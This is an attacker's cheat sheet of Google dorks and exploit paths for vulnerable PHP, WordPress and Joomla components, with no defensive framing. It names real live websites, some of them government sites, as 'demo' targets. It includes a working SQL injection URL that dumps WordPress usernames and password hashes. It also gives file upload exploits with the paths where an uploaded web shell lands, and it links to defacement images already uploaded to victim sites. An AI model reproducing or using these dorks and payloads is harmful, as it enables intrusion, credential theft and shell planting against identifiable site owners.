Dorks and google exploits

1. intitle:Powered By phUploader
2.  
3. Dork: inurl:/editor/tmedit/popups
4. Exploit Path : /editor/tmedit/popups/InsertFile/insert_file.php
5.  
6.  
7. inurl:/upload.php intext:Image Upload
8.  
9.  
10.  
11. 1.Espacio Ecuador
12. [ dork ]
13. intext:"developed by Espacio Ecuador" inurl:id=
14. [ demo ]
15. http://www.mytripecuador.com/ecuador-hotels/hotel.php?id=25
16. [ details ]
17. http://cxsecurity.com/issue/WLB-2012110228
18.  
19. 2. Seventeen Design
20. [ dork ]
21. intext:"Producido por: Seventeen Design." inurl:id=
22. [ demo ]
23. http://www.monteavila.gob.ve/mae/detail_new.php?id=147'
24. [ details ]
25. http://cxsecurity.com/issue/WLB-2012110225
26.  
27. 3. Plugin Wordpress Newsletter
28. [ dork ]
29. allinurl:stnl_iframe.php?newsletter=
30. [ demo ]
31. http://preventcancernow.ca/wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=7
32.  
33. 4. Plugin Wodpress Wp- Imagezoon
34. [ dork ]
35. allinurl:wp-imagezoom/zoom.php?id=
36. [ demo ]
37. http://asiasons.com/wp-content/plugins/wp-imagezoom/zoom.php?id=GnAaX
38.  
39. 5. Wordpress Daily Edditionmouss
40. [ dork ]
41. inurl:fiche-artiste.php?id=
42. inurl:themes/dailyedition-mouss/fiche-artiste.php?id=
43. [ demo ]
44. http://hotnewrap.net/wp-content/themes/dailyedition-mouss/fiche-artiste.php?id=383
45.  
46. 6. Wp- Plugin" Plg_Novana"
47. [ dork ]
48. inurl:novana_detail.php?**id=
49. [ exploit ]
50. /wp-content/plugins/plg_novana/novana_detail.php?lightbox[width]=700&lightbox[height]=400&id=[sql]
51. [ demo ]
52. http://avenuepattaya.net/wp-content/plugins/plg_novana/novana_detail.php?lightbox[width]=700&lightbox[height]=400&id=-35+union+select+1,2,3,4,5,6,7,8,9,group_concat%28user_login,user_pass%29,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+wp_users--
53. [ detail ]
54. http://1337day.com/exploit/19787
55.  
56. 7. Girl .php
57. [ dork ]
58. inurl:girl.php?id=
59. [ demo ]
60. http://www.btsfashionshow.com/girl.php?id=6
61. http://www.aramis-london-escorts.com/girl.php?id=301
62. http://www.pornescort.xxx/girl.php?id=68
63.  
64. 8. Like .php
65. [ dork ]
66. inurl:like.php?id= intext:LikeItNow Script © 2010
67. [ demo ]
68. http://neonapster.net23.net/like.php?id=34%27
69.  
70.  
71. Tamper Data
72.  
73. 1. Joomla Componen com_smartformer
74. [ dork ]
75. inurl:index.php?option=com_smartformer inurl:itemid= intext:Upload
76. [ demo ]
77. http://www.goodarch2u.com.my/index.php?option=com_smartformer&Itemid=439&lang=en
78. http://www.finenge.com/en/index.php?option=com_smartformer&Itemid=90
79. [ shell location ]
80. site/components/com_smartformer/files/yournameshell.php
81. [ details ]
82. http://1337day.com/exploit/19825
83.  
84. 2. Plugin Wordpress Zarzadzanie Kontem (Ajax File Manager)
85. [ dork ]
86. inurl:"ajaxfilemanager.php?page=" intitle:ajax file manager
87. [ demo ]
88. http://www.madiunkab.go.id/qwerty/filemanager/ajaxfilemanager.php?page=3
89. http://www.hacker-motor.com/javascript/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php?page=5
90.  
91. 3.Wp- Plugin "tdo-mini-form"
92. [ dork ]
93. inurl:tdomf-upload-inline.php?tdomf_form_id= intext:Upload
94. [ link upload file ]
95. site/wp-content/uploads/tdomf/tmp/$tdomf_form_id(value)/$user_agent(IP)/$filename.PHP;.jpg
96. [ example ]
97. wp-content/uploads/tdomf/tmp/1/127.0.0.1/z3ro.PHP;.jpg
98. [ demo ]
99. http://www.tutufoundationusa.org/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=
100. [ details ]
101. http://1337day.com/exploit/19776
102.  
103. 4.JQuery File Upload
104. [ dork ]
105. intitle:upload intext:Add files.. "Start upload" Cancel upload Delete
106. [ vuln ]
107. http://konceptsigngroup.com/jQuery-FileUpload/index.html
108. [ demo ]
109. http://konceptsigngroup.com/jQuery-FileUpload/server/php/thumbnails/anonymous%20muslim.jpg
110.  
111. 5. Upload Tiny Browser
112. [new dork ]
113. inurl:tinybrowser/upload.php
114. intitle:Index of / intext:Parent Directory "tinybrowser/"
115. inurl:/tinybrowser/ intitle:TinyBrowser :: ext:php
116. inurl:tinybrowser/upload.php intext:Enviar Arquivos intitle:TinyBrowser :: Upload
117. inurl:type=image& intext:Enviar Arquivos intitle:TinyBrowser :: Upload
118. [ demo ]
119. http://www.maspa.com.br/clientes/lj/admin/js/tiny_mce/plugins/tinybrowser/upload.php
120. [ example ]
121. http://www.maspa.com.br/uploads/images/_thumbs/_anonymous_muslims.jpg
122. [ details ]
123. http://1337day.com/exploit/19732
124.  
125. 6. Joomla File Upload "com_autostand"
126. [dork ]
127. inurl:index.php?option=** func=newItem intext:Select Image Add a Car
128. inurl:index.php?option=** func=newItem intext:Select Image Publish Only available to admin
129. inurl:index.php?option=com_autostand
130. [ poc ]
131. site/inurl:index.php?option=com_autostand&func=newItem
132. [ demo ]
133. http://www.karahan.be//index.php?option=com_autostand&func=newItem
134.  
135.  
136. TAMPER DATA & SHELL UPLOAD
137.  
138. 1. Plugin Spot Light
139. [ dork ]
140. intitle:index of /../plugins/spotlightyour/monetize/ intext:Parent Directory "upload/"
141. inurl:wp-content monetize/upload/ intext:Uploading Please wait ... Uploaded Successfully.
142. inurl:wp-content/plugins/spotlightyour/
143. [ exploit ]
144. http://site/wp-content/plugins/spotlightyour/monetize/upload/
145. [ shell access ]
146. wp-content/uploads/[year]/[month]/[search your shell].php
147. [ example ]
148. http://pure-cashmere-pashmina-scarves.com/wp-content/plugins/spotlightyour/monetize/upload/